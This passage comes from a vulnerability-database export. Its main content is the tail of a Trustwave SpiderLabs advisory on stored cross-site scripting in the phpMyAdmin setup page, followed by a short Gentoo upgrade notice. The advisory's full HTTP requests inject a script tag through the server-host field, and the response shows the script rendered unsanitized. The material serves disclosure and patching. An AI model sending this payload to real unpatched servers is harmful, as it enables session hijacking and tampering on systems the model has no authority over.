http://A.B.C.D/phpmyadmin/setup/index.php?phpMyAdmin=12l6mt8qnlme3o673h75fuj5a6qijnvf&amp;tab_hash=&amp;check_page_refresh=1&amp;lang=en&amp;collation_connection=utf8_general_ci&amp;token=5acce3a965bbe9d42ce50bdf3d491ed9&amp;page=servers&amp;mode=add&amp;submit=New+server\r\nCookie: phpMyAdmin=12l6mt8qnlme3o673h75fuj5a6qijnvf; pma_lang=en\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: 1430\r\n\r\ntab_hash=&amp;check_page_refresh=1&amp;collation_connection=utf8_general_ci&amp;token=5acce3a965bbe9d42ce50bdf3d491ed9&amp;Servers-0-verbose=&amp;Servers-0-host=&#37;3Cscript&#37;3Ealert&#37;28&#37;27XSS&#37;27&#37;29&#37;3B&#37;3C&#37;2Fscript&#37;3E&amp;Servers-0-port=&amp;Servers-0-socket=&amp;Servers-0-connect_type=tcp&amp;Servers-0-extension=mysqli&amp;submit_save=Save&amp;Servers-0-auth_type=cookie&amp;Servers-0-user=root&amp;Servers-0-password=&amp;Servers-0-auth_swekey_config=&amp;Servers-0-auth_http_realm=&amp;Servers-0-SignonSession=&amp;Servers-0-SignonURL=&amp;Servers-0-LogoutURL=&amp;Servers-0-only_db=&amp;Servers-0-only_db-userprefs-allow=on&amp;Servers-0-hide_db=&amp;Servers-0-hide_db-userprefs-allow=on&amp;Servers-0-AllowRoot=on&amp;Servers-0-DisableIS=on&amp;Servers-0-AllowDeny-order=&amp;Servers-0-AllowDeny-rules=&amp;Servers-0-ShowDatabasesCommand=SHOW+DATABASES&amp;Servers-0-pmadb=&amp;Servers-0-controluser=&amp;Servers-0-controlpass=&amp;Servers-0-verbose_check=on&amp;Servers-0-bookmarktable=&amp;Servers-0-relation=&amp;Servers-0-userconfig=&amp;Servers-0-table_info=&amp;Servers-0-column_info=&amp;Servers-0-history=&amp;Servers-0-tracking=&amp;Servers-0-table_coords=&amp;Servers-0-pdf_pages=&amp;Servers-0-designer_coords=&amp;Servers-0-tracking_default_statements=CREATE+TABLE&#37;2CALTER+TABLE&#37;2CDROP+TABLE&#37;2CRENAME+TABLE&#37;2CCREATE+INDEX&#37;2CDROP+INDEX&#37;2CINSERT&#37;2CUPDATE&#37;2CDELETE&#37;2CTRUNCATE&#37;2CREPLACE&#37;2CCREATE+VIEW&#37;2CALTER+VIEW&#37;2CDROP+VIEW&#37;2CCREATE+DATABASE&#37;2CALTER+DATABASE&#37;2CDROP+DATABASE&amp;Servers-0-tracking_add_drop_view=on&amp;Servers-0-tracking_add_drop_table=on&amp;Servers-0-tracking_add_drop_database=on\r\n\r\n\r\n3. View unsanitized script tags on the Setup overview page:\r\n\r\nRequest\r\n-------\r\nGET /phpmyadmin/setup/index.php HTTP/1.1\r\nHost: A.B.C.D\r\nUser-Agent: Mozilla/5.0 &#40;Macintosh; Intel Mac OS X 10.6; rv:8.0.1&#41; Gecko/20100101 Firefox/8.0.1\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Language: en-us,en;q=0.5\r\nAccept-Encoding: gzip, deflate\r\nAccept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\r\nProxy-Connection: keep-alive\r\nReferer: http://A.B.C.D/phpmyadmin/setup/index.php?phpMyAdmin=12l6mt8qnlme3o673h75fuj5a6qijnvf&amp;tab_hash=&amp;check_page_refresh=1&amp;lang=en&amp;collation_connection=utf8_general_ci&amp;token=5acce3a965bbe9d42ce50bdf3d491ed9&amp;page=servers&amp;mode=add&amp;submit=New+server\r\nCookie: phpMyAdmin=12l6mt8qnlme3o673h75fuj5a6qijnvf; pma_lang=en\r\n\r\nResponse\r\n--------\r\nHTTP/1.1 200 OK\r\nDate: Thu, 01 Dec 2011 16:44:18 GMT\r\nServer: Apache/2.2.20 &#40;Ubuntu&#41;\r\nX-Powered-By: PHP/5.3.6-13ubuntu3.2\r\nExpires: Thu, 01 Dec 2011 16:44:18 GMT\r\nCache-Control: no-store, no-cache, must-revalidate, pre-check=0, post-check=0, max-age=0\r\nLast-Modified: Thu, 01 Dec 2011 16:44:18 GMT\r\nX-Frame-Options: SAMEORIGIN\r\nX-Content-Security-Policy: allow &#39;self&#39;; options inline-script eval-script; frame-ancestors &#39;self&#39;; img-src &#39;self&#39; data:; script-src &#39;self&#39; www.phpmyadmin.net\r\nPragma: no-cache\r\nVary: Accept-Encoding\r\nContent-Length: 7852\r\nContent-Type: text/html; charset=utf-8\r\n\r\n---snip---\r\n\r\n&lt;div class=&quot;notice&quot; id=&quot;Servers/1/ssl&quot;&gt;&lt;h4&gt;Use SSL &#40;&lt;script&gt;alert&#40;&#39;XSS&#39;&#41;;&lt;/script&gt;&#41;&lt;/h4&gt;You should use SSL connections if your web server supports it.&lt;/div&gt;\r\n\r\nPlease note that valid database credentials are not required to exploit\r\nthis vulnerability.\r\n\r\n\r\nRemediation Steps:\r\nphpMyAdmin version 3.4.9 includes a fix for this security issue. Apply\r\nthe appropriate vendor updates for this product or upgrade to a current and\r\nsecure version of phpMyAdmin.\r\n\r\n\r\nRevision History:\r\n12/7/11 - Vulnerability disclosed\r\n12/21/11 - Patch released by vendor\r\n12/22/11 - Advisory published\r\n\r\n\r\nAbout Trustwave:\r\nTrustwave is the leading provider of on-demand and subscription-based\r\ninformation security and payment card industry compliance management\r\nsolutions to businesses and government entities throughout the world. For\r\norganizations faced with today&#39;s challenging data security and compliance\r\nenvironment, Trustwave provides a unique approach with comprehensive\r\nsolutions that include its flagship TrustKeeper compliance management\r\nsoftware and other proprietary security solutions. Trustwave has helped\r\nthousands of organizations--ranging from Fortune 500 businesses and large\r\nfinancial institutions to small and medium-sized retailers--manage\r\ncompliance and secure their network infrastructure, data communications and\r\ncritical information assets. Trustwave is headquartered in Chicago with\r\noffices throughout North America, South America, Europe, Africa, China and\r\nAustralia. For more information, visit https://www.trustwave.com\r\n\r\nAbout Trustwave&#39;s SpiderLabs:\r\nSpiderLabs&#40;R&#41; is the advanced security team at Trustwave focused on\r\napplication security, incident response, penetration testing, physical\r\nsecurity and security research. The team has performed over a thousand\r\nincident investigations, thousands of penetration tests and hundreds of\r\napplication security tests globally. In addition, the SpiderLabs Research\r\nteam provides intelligence through bleeding-edge research and proof of\r\nconcept tool development to enhance Trustwave&#39;s products and services.\r\nhttps://www.trustwave.com/spiderlabs\r\n\r\nDisclaimer:\r\nThe information provided in this advisory is provided &quot;as is&quot; without\r\nwarranty of any kind. Trustwave disclaims all warranties, either express or\r\nimplied, including the warranties of merchantability and fitness for a\r\nparticular purpose. In no event shall Trustwave or its suppliers be liable\r\nfor any damages whatsoever including direct, indirect, incidental,\r\nconsequential, loss of business profits or special damages, even if\r\nTrustwave or its suppliers have been advised of the possibility of such\r\ndamages. Some states do not allow the exclusion or limitation of liability\r\nfor consequential or incidental damages so the foregoing limitation may not\r\napply.\r\n\r\nThis transmission may contain information that is privileged, confidential, and/or exempt from disclosure under applicable law. If you are not the intended recipient, you are hereby notified that any disclosure, copying, distribution, or use of the information contained herein &#40;including any reliance thereon&#41; is STRICTLY PROHIBITED. If you received this transmission in error, please immediately contact the sender and destroy the material in its entirety, whether in electronic or hard copy format.\r\n", "modified": "2011-12-26T00:00:00", "published": "2011-12-26T00:00:00", "id": "SECURITYVULNS:DOC:27487", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:27487", "title": "TWSL2011-019: Cross-Site Scripting Vulnerability in phpMyAdmin", "type": "securityvulns", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}, {"lastseen": "2018-08-31T11:09:45", "bulletinFamily": "software", "description": "PHP inclusions, SQL injections, directory traversals, crossite scripting, information leaks, etc.", "modified": "2011-12-26T00:00:00", "published": "2011-12-26T00:00:00", "id": "SECURITYVULNS:VULN:12117", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:12117", "title": "Web applications security vulnerabilities summary &#40;PHP, ASP, JSP, CGI, Perl&#41;", "type": "securityvulns", "cvss": {"score": 6.5, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "gentoo": [{"lastseen": "2016-09-06T19:46:45", "bulletinFamily": "unix", "description": "### Background\n\nphpMyAdmin is a web-based management tool for MySQL databases. \n\n### Description\n\nMultiple vulnerabilities have been discovered in phpMyAdmin. Please review the CVE identifiers and phpMyAdmin Security Advisories referenced below for details. \n\n### Impact\n\nRemote attackers might be able to insert and execute PHP code, include and execute local PHP files, or perform Cross-Site Scripting (XSS) attacks via various vectors. \n\n### Workaround\n\nThere is no known workaround at this time.\n\n### Resolution\n\nAll phpMyAdmin users should upgrade to the latest version:\n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \">=dev-db/phpmyadmin-3.4.9\"", "modified": "2012-01-04T00:00:00", "published": "2012-01-04T00:00:00", "id": "GLSA-201201-01", "href": "https://security.gentoo.org/glsa/201201-01", "type": "gentoo", "title": "phpMyAdmin: Multiple vulnerabilities", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}]}